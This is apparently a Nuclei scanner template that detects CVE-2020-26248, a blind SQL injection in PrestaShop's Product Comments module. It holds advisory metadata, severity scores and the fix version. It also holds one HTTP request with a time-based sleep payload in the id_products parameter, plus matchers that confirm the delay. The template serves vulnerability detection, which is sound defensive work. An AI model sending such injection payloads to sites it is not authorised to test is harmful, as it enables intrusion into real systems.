id: CVE-2020-26248 info: name: PrestaShop Product Comments <4.2.0 - SQL Injection author: edoardottt severity: high description: | PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site. reference: - https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html - https://packagist.org/packages/prestashop/productcomments - https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9 - https://nvd.nist.gov/vuln/detail/CVE-2020-26248 remediation: Fixed in 4.2.1. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H cvss-score: 8.2 cve-id: CVE-2020-26248 cwe-id: CWE-89 metadata: verified: "true" tags: cve,cve2020,sqli,prestshop,packetstorm requests: - raw: - | @timeout: 20s GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and # Enhanced by md on 2022/12/08